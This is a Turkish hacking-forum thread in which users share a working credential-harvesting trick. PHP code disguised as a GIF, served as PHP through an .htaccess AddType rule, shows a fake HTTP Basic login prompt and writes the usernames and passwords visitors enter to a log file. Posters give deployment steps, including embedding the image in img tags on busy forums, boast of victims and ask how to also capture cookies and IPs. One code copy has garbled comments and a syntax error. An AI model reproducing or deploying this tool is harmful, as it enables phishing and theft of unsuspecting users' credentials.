Forum
Aktif konular
Üyeler
Kurallar
Arama
Tahribat.com Forumları 
Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri 
10 Numara Yöntem Ama Nasıl? 10 Numara Yöntem Ama Nasıl?
-
hocam şunu tam olarak yazarmısınız yaw :|
-
daha nasıl tam olarak anlatalım. takıldığın yer neresi
-
yılların olayını ağlattınız ama :D açıklayayım
şimdi bir resim dosyasının içine istediğiniz kodu girersiniz.normalde internet explorer mal ve salak olduğundan direkt bu halini yer.ama işimizi sağlama alalım diye .htaccess içerisine .jpg yada .gif dosyalarını php olarak okut dersiniz.bunun sonucunda karşıdaki site bunu php olarak ekrana yansıtır.bukadar -
Genki bunu yazdı:
-----------------------------daha nasıl tam olarak anlatalım. takıldığın yer neresi
----------------------------
hocam şöyle açıklamalı adım adım çünkü bi yerde hata yapıyorum olmuyor -
dosyları vereyim arkadaşlar
htaccess içine bunu yazın kaydetin sunucuya atın
AddType application/x-httpd-php .gif
evet şimdi linke koyucamız gif in kodları
//äåëàåì ñêğèïò êàğòèíêîé
header("Content-type: image/gif");
//äåëàåì èçîáğàæåíèå ñìàéëèêîì èç àğõèâà
$image = imagecreatefromgif('mellow.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
//Àâòîğèçàöèÿ ïğîéä¸ò, åñëè ïàğîëü áîëüøå 4-¸õ ñèìâîëîâ è âîîáùå íàïèñàí ëîãèí
if(strlen($pass) <= 4 || !$login
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="siberaskerler.org - login"');
}
elseif($login)
{
//ñòàâèì êóêèñ, ÷òîáû ïğè ïîâòîğíîì çàõîäå àâòîğèçàöèè íåáûëî, â ñàìîì íà÷àëå ïğîâåğêà åñòü ëè êóêèñ ))
setcookie('LOGON',md5($pass));
//çàïèøåì ïàğîëè â ôàéë
$f = fopen('passwords.txt', 'ab'); //passwords.txt
fwrite($f, $login." ||| ".$pass."\r\n"); //â ôîğìàòå LOGIN ||| PASSWORD
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
birda password.txt diye dosya açıcaz ve bunun yazma chmod iznini 777 yapıcaz daha sonra kurban siteye
seninlinkin diye yedir.
-
beyler ben yaptım bi şekilde bunu çokta güzel düşüyo millet:D ama geliştirirsek daha iyi olur diye düşünüyorum..mesela kimi adamlar durumu çakıyo ve hadi lan ordan sttir fln yazio kullanıcı adı ve şifrelerine..ben o adamaların cookielerini veya ip lerini alabilirmiyim?? eğer öyle bşe olrsa çok datlı olr:D
-
nitrous :P kopgel hünahlarından :)
-
benim ne günahım war be hacı masım sibyanin tekiyim ben:D bi el atta yapak şunu yaw:D saolasın çok büyük yardımın dokundu bunuda ypsan dadından yenmez:D
-
smile.php içeriği
PHP- Kodu:<?
header("Content-type: image/gif");
$image = imagecreatefromgif('x.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Login / Password"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('log.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
.htaccess içeriği
Kod:AddType application/x-httpd-php .gif
smile.php ile .htaccess sunucuya atılır
smile.php nin adı smile.gif olarak değiştirilir.
gözükmesini istediğiniz bir resim bulunur ve adı x.gif olarak değiştirilerek aynı dizine atılır.
log.txt dosyası oluşturulur ve chmod 777 verilir.
sonra herhangi bir foruma girilir hit alan bir konunun altına img tagı içinde
Kod:http://siteniz.com/smile.gif
adresi verilir.
işte bu kadar ben yaptım bir iki foruma gayet kolay ve basit. herkese kolay gelsin
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla